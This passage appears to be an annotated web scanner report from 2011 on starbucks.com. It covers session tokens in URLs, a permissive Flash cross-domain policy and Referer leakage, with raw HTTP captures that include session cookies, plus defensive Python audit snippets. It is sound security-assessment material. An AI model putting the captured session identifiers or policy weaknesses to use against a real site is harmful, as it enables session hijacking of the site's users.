...[SNIP]...
<li><a href="http://news.starbucks.com/archive.cfm?CFID=3052726&amp;CFTOKEN=8332390bc1ef3916-0F6C385F-BE80-8ECA-DDDC9A0DCA48A727">Press Release Archives</a>
...[SNIP]...

3.6. http://www.starbucks.com/about-us/company-information/product-advisories

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.starbucks.com
Path:   /about-us/company-information/product-advisories

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /about-us/company-information/product-advisories HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:17:53 GMT
Connection: close
Content-Length: 38316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<li><a href="http://news.starbucks.com/archive.cfm?CFID=3052726&amp;CFTOKEN=8332390bc1ef3916-0F6C385F-BE80-8ECA-DDDC9A0DCA48A727">Press Release Archives</a>
...[SNIP]...

3.7. http://www.starbucks.com/about-us/our-heritage

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.starbucks.com
Path:   /about-us/our-heritage

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /about-us/our-heritage HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:17:47 GMT
Connection: close
Content-Length: 37409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<li><a href="http://news.starbucks.com/archive.cfm?CFID=3052726&amp;CFTOKEN=8332390bc1ef3916-0F6C385F-BE80-8ECA-DDDC9A0DCA48A727">Press Release Archives</a>
...[SNIP]...

3.8. http://www.starbucks.com/site-map

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.starbucks.com
Path:   /site-map

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /site-map HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:20:21 GMT
Connection: close
Content-Length: 92706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<li><a href="http://news.starbucks.com/archive.cfm?CFID=3052726&amp;CFTOKEN=8332390bc1ef3916-0F6C385F-BE80-8ECA-DDDC9A0DCA48A727">Press Release Archives</a>
...[SNIP]...

4. Flash cross-domain policy

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.starbucks.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 06 Dec 2010 21:05:34 GMT
Accept-Ranges: bytes
ETag: "1bcfd5528995cb1:0"
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:02:26 GMT
Connection: close
Content-Length: 2004

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all" />

...[SNIP]...
<allow-access-from domain="*.starbucks.com" />
   <allow-access-from domain="*.starbucks.net" />
   <allow-access-from domain="*.brightcove.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.plymedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.subply.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.sbweb.prod" />
   <allow-access-from domain="localhost" />
   <allow-access-from domain="*.tazo.com" />
   <allow-access-from domain="dev101.zaaz.com" />

   <allow-access-from domain="*.zaaz.com" />
   <allow-access-from domain="66.150.7.162" />
   <allow-access-from domain="216.26.171.116" />
   <allow-access-from domain="216.70.126.141" />
   <allow-access-from domain="216.128.18.110" />
   <allow-access-from domain="v027u06pye.maximumasp.com" />
   <allow-access-from domain="*.nytimes.com" />
   <allow-access-from domain="*.hearmusic.com" />
   <allow-access-from domain="*.starbucksentertainment.com" />
...[SNIP]...
<allow-access-from domain="*.bbc.co.uk" />
   <allow-access-from domain="*.facebook.ca" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="*.macleans.ca" />
   <allow-access-from domain="*.msn.ca" />
   <allow-access-from domain="*.msn.com" />
   <allow-access-from domain="*.dartmotif.com" />
   <allow-access-from domain="*.2mdn.net" />

   <allow-access-from domain="*.doubleclick.net" />
   <allow-access-from domain="*.doubleclick.com" />
   <allow-access-from domain="*.adcdn.com" />
   <allow-access-from domain="*.starbucks.ca" />
   <allow-access-from domain="*.straight.com" />
   <allow-access-from domain="*.theglobeandmail.com" />
   <allow-access-from domain="*.yahoo.ca" />
   <allow-access-from domain="*.yahoo.com" />
...[SNIP]...
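The remediation above asks for a review of every allowed domain. The Python below is an added example for that review, not part of the report or of any Adobe tooling: it parses a policy of the form shown in the response and flags the entries the issue text warns about (wildcards, third-party domains, bare IP literals, localhost, `secure="false"`, and a site-control meta-policy of `all`, which lets any other policy file on the host be honoured). The sample policy is a cut-down copy of the one above with the ...[SNIP]... portions omitted; the first-party suffix list and the short finding codes are this example's own choices.

```python
import ipaddress
import xml.etree.ElementTree as ET

# Cut-down copy of the policy in the response above; entries hidden behind
# ...[SNIP]... in the report are not reproduced. Used here as sample input.
SAMPLE_POLICY = """<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all" />
   <allow-access-from domain="*.starbucks.com" />
   <allow-access-from domain="*.starbucks.net" />
   <allow-access-from domain="*.brightcove.com" secure="false"/>
   <allow-access-from domain="*.sbweb.prod" />
   <allow-access-from domain="localhost" />
   <allow-access-from domain="dev101.zaaz.com" />
   <allow-access-from domain="66.150.7.162" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="*.doubleclick.net" />
</cross-domain-policy>
"""

# Registrable domains the application owner controls. An assumption for this
# example; the policy itself does not say which entries are first-party.
FIRST_PARTY = ("starbucks.com", "starbucks.net", "starbucks.ca")


def _is_first_party(domain: str, first_party) -> bool:
    host = domain[2:] if domain.startswith("*.") else domain
    return any(host == s or host.endswith("." + s) for s in first_party)


def _is_ip_literal(domain: str) -> bool:
    try:
        ipaddress.ip_address(domain)
        return True
    except ValueError:
        return False


def review_policy(xml_text: str, first_party=FIRST_PARTY) -> dict:
    """Return {entry: [finding codes]} for every entry that deserves a look.

    Codes: site-control-all (any policy file on the host may grant access),
    wildcard (every host under the suffix is trusted, so one XSS anywhere in
    it reaches this site), ip-literal, localhost (any server on the user's
    own machine), third-party (not under a first-party suffix), insecure
    (secure="false": plain-HTTP origins may read this HTTPS site's responses).
    """
    root = ET.fromstring(xml_text)
    findings = {}
    site_control = root.find("site-control")
    if site_control is not None and \
            site_control.get("permitted-cross-domain-policies", "").lower() == "all":
        findings["site-control"] = ["site-control-all"]
    for entry in root.iter("allow-access-from"):
        domain = entry.get("domain", "")
        reasons = []
        if domain == "*" or domain.startswith("*."):
            reasons.append("wildcard")
        if domain == "localhost":
            reasons.append("localhost")
        elif _is_ip_literal(domain):
            reasons.append("ip-literal")
        elif not _is_first_party(domain, first_party):
            reasons.append("third-party")
        if entry.get("secure", "true").lower() == "false":
            reasons.append("insecure")
        if reasons:
            findings[domain] = reasons
    return findings


if __name__ == "__main__":
    for entry, reasons in review_policy(SAMPLE_POLICY).items():
        print(f"{entry:25s} {', '.join(reasons)}")
```

Two caveats when reading the output. A `*.starbucks.com` wildcard is flagged even though it is first-party, because the section 2 findings show that an XSS on any host under that suffix would give an attacker a Flash-capable origin the policy trusts. And the policy's age matters: Flash Player reached end of life at the end of 2020, so today this file is a legacy artefact, but the same file was also consumed by other plug-ins (Silverlight, for one), and it still documents which third parties were once granted two-way access.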

5. Cross-domain Referer leakage
There are 5 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
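Findings 3 and 5 are two sides of the same review: which URLs in a response carry a session token, and which off-site links or embedded resources will receive the current page's URL in the Referer header. The Python below is an added example, not the scanner's code or the site's: one link extractor serves both checks. Its sample page is constructed from the links quoted in section 3 (the news.starbucks.com archive link) and in entry 5.1 (the AddThis and My Starbucks Idea links), using the page URL of entry 5.1. The list of session-parameter names and the hostname-based notion of "other domain" are this example's assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import parse_qsl, urljoin, urlsplit

# Query-parameter names that usually carry a session identifier. A starting
# list chosen for this example, not one the report enumerates; extend it for
# the frameworks in scope.
SESSION_PARAM_NAMES = {
    "cfid", "cftoken",          # ColdFusion, as in the news.starbucks.com link
    "jsessionid", "phpsessid", "asp.net_sessionid", "sessionid", "sid",
}

# Constructed sample page: the links quoted in sections 3 and 5.1 plus one
# same-host relative link, paired with the page URL of entry 5.1.
SAMPLE_PAGE_URL = "http://www.starbucks.com/menu/catalog/nutrition?food=all&wellness=high-fiber"
SAMPLE_HTML = """
<li><a href="http://news.starbucks.com/archive.cfm?CFID=3052726&amp;CFTOKEN=8332390bc1ef3916-0F6C385F-BE80-8ECA-DDDC9A0DCA48A727">Press Release Archives</a>
<a href="http://www.addthis.com/bookmark.php?v=250&amp;username=starbucks&amp;url=http://www.starbucks.com/menu/catalog/nutrition?food=all&wellness=high-fiber" class="addthis_button_compact">Post to AddThis</a>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Food">My Starbucks Idea</a>
<a href="/about-us">About Us</a>
"""


class _LinkCollector(HTMLParser):
    """Collects every URL the page links to or embeds; the browser sends a
    Referer for both kinds of request."""

    URL_ATTRS = {"a": "href", "link": "href", "form": "action",
                 "script": "src", "img": "src", "iframe": "src"}

    def __init__(self) -> None:
        super().__init__()
        self.urls: list = []

    def handle_starttag(self, tag, attrs):
        attr = self.URL_ATTRS.get(tag)
        value = dict(attrs).get(attr) if attr else None
        if value:
            self.urls.append(value)  # &amp; has already been decoded to &


def extract_links(html_text: str, page_url: str) -> list:
    parser = _LinkCollector()
    parser.feed(html_text)
    parser.close()
    return [urljoin(page_url, u) for u in parser.urls]


def session_token_links(html_text: str, page_url: str) -> list:
    """Finding 3: links whose query string (or a ;jsessionid= path segment)
    carries a session-token-like parameter. Returns [(url, [names])]."""
    hits = []
    for url in extract_links(html_text, page_url):
        parts = urlsplit(url)
        names = [name for name, _ in parse_qsl(parts.query, keep_blank_values=True)
                 if name.lower() in SESSION_PARAM_NAMES]
        if ";jsessionid=" in parts.path.lower():
            names.append("jsessionid (path)")
        if names:
            hits.append((url, names))
    return hits


def referer_leak_targets(html_text: str, page_url: str) -> list:
    """Finding 5: when page_url carries a query string, every off-host link or
    embedded resource receives that whole URL, query included, in the Referer
    header. Returns the distinct foreign hostnames, or [] if there is no query."""
    page = urlsplit(page_url)
    if not page.query:
        return []
    hosts = {urlsplit(u).hostname for u in extract_links(html_text, page_url)}
    return sorted(h for h in hosts if h and h != page.hostname)


if __name__ == "__main__":
    for url, names in session_token_links(SAMPLE_HTML, SAMPLE_PAGE_URL):
        print(f"session token in URL: {names} -> {url}")
    for host in referer_leak_targets(SAMPLE_HTML, SAMPLE_PAGE_URL):
        print(f"Referer leak: {SAMPLE_PAGE_URL} will be sent to {host}")
```

The Referer check compares hostnames, so news.starbucks.com counts as foreign here even though it is a sibling of www.starbucks.com; tighten that to a registrable-domain comparison if sibling hosts are in scope. Note also that the AddThis link copies the page URL into its own query string, so that one leaks the URL directly, not only through the Referer header. Current browsers default to a strict-origin-when-cross-origin referrer policy, which drops the path and query on cross-origin requests, but the remediation above still stands: a secret in the query string is also in server logs, proxy logs and browser history, and no referrer policy helps with those.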


5.1. http://www.starbucks.com/menu/catalog/nutrition

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/catalog/nutrition

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /menu/catalog/nutrition?food=all&wellness=high-fiber HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:04:14 GMT
Connection: close
Content-Length: 50715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<p>We would love to hear your suggestions at <a href="http://mystarbucksidea.force.com/">MyStarbucksIdea.com.</a>
...[SNIP]...
</span>
   <a href="http://www.addthis.com/bookmark.php?v=250&amp;username=starbucks&amp;url=http://www.starbucks.com/menu/catalog/nutrition?food=all&wellness=high-fiber" class="addthis_button_compact" title="Post to AddThis"><img src="/static/images/share-icon-addthis.gif" alt="Share on AddThis" />
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Coffee+%26+Espresso+Drinks">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Food">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Atmosphere+%26+Locations">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="https://www.starbuckscardb2b.com/">Corporate Sales</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Starbucks+Card">My Starbucks Idea</a>
...[SNIP]...
<li id="nav_shop"><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTB&amp;Redir=">Shop<br />
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fcoffee%2F">Coffee</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8750">Latin America Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8751">Africa/Arabia Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8752">Asia/Pacific Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D0153">Multi-Region Blends</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D0171">Specialty Roasts</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fvia%2F">Instant Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2FStarbucksAtHome%2F">Subscriptions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Foffice%2F">For Business</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Ftazo%2Dtea%2F">Tazo.. Tea</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0174">Black Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0176">Green Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0973">White Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0178">Herbal Infusions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2FStarbucksAtHome%2F">Subscriptions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Foffice%2F">For Business</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fequipment%2Easp">Brewing Equipment</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0966">Coffee Presses</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0266">Coffeemakers</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0950">Espresso Machines</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0970">Grinders</a>
...[SNIP]...
<dd><a href="https://www.starbuckscardb2b.com/">Corporate Buying</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTUM&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0035%26SubClassNo%3D0262%26cpnum%3DDRINKWARE">Drinkware</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHGF&amp;Redir=%2FGiftIdeas%2F">Gift Packs</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHMU&amp;Redir=%2Fentertainment%2F">Music CDs</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHABT&amp;Redir=%2Fproducts%2Fshabotus%2Easp">About Starbucks Store</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Merchandise+%26+Music">My Starbucks Idea</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/coffee-machines/?CCAID=SBPTPAHPODEA">Enjoy Our Espresso at Home</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/coffee-machines/?CCAID=SBPTPAHPODEA"><img src="http://assets.starbucks.com/assets/095c195acda948c4bee84fd51eb448a5.jpg" alt="Enjoy espresso at home" />
...[SNIP]...
<li><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Food">My Starbucks Idea</a>
...[SNIP]...
<li><a href="https://www.starbuckscardb2b.com/">Starbucks Card Corporate Sales</a>
...[SNIP]...
<li><a href="http://www.twitter.com/starbucks/">Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/starbucks/">Facebook</a>
...[SNIP]...
<li><a href="http://www.youtube.com/starbucks">YouTube</a>
...[SNIP]...
<li><a href="http://mystarbucksidea.force.com/">My Starbucks Idea</a>
...[SNIP]...
<li><a href="http://www.v2v.net/starbucks">Starbucks V2V</a>
...[SNIP]...
<li><a href="http://www.starbucks.at/">Austria/&#214;sterreich</a>
...[SNIP]...
<li><a href="http://www.starbucks.bg/">Bulgaria</a>
...[SNIP]...
<li><a href="http://www.starbucks.ca/">Canada</a>
...[SNIP]...
<li><a href="http://www.starbucks.cl">Chile</a>
...[SNIP]...
<li><a href="http://www.starbuckscoffee.cz/">Czech Republic</a>
...[SNIP]...
<li><a href="http://www.starbucks.fr/">France</a>
...[SNIP]...
<li><a href="http://www.starbucksgermany.com/">Germany/Deutschland</a>
...[SNIP]...
<li><a href="http://www.starbucks.hu/">Hungary</a>
...[SNIP]...
<li><a href="http://www.starbucks.pl/">Poland</a>
...[SNIP]...
<li><a href="http://www.starbucks.pt/">Portugal</a>
...[SNIP]...
<li><a href="http://www.starbucksromania.ro/">Romania</a>
...[SNIP]...
<li><a href="http://www.starbuckscoffee.ru/">Russia</a>
...[SNIP]...
<li><a href="http://www.istarbucks.co.kr/">South Korea</a>
...[SNIP]...
<li><a href="http://www.starbucks.es/">Spain/Espa&ntilde;a</a>
...[SNIP]...
<li><a href="http://www.starbucks.ch/">Switzerland/Schweiz</a>
...[SNIP]...

5.2. http://www.starbucks.com/menu/catalog/nutrition

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/catalog/nutrition

Issue detail

The page was loaded from a URL containing a query string (see the request below). The response contains the following links to other domains (see the response body below):

Request

GET /menu/catalog/nutrition?drink=bottled-drinks HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:03:53 GMT
Connection: close
Content-Length: 44711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</span>
   <a href="http://www.addthis.com/bookmark.php?v=250&amp;username=starbucks&amp;url=http://www.starbucks.com/menu/catalog/nutrition?drink=bottled-drinks" class="addthis_button_compact" title="Post to AddThis"><img src="/static/images/share-icon-addthis.gif" alt="Share on AddThis" />
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Coffee+%26+Espresso+Drinks">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Food">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Atmosphere+%26+Locations">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="https://www.starbuckscardb2b.com/">Corporate Sales</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Starbucks+Card">My Starbucks Idea</a>
...[SNIP]...
<li id="nav_shop"><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTB&amp;Redir=">Shop<br />
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fcoffee%2F">Coffee</a>
...[SNIP]...
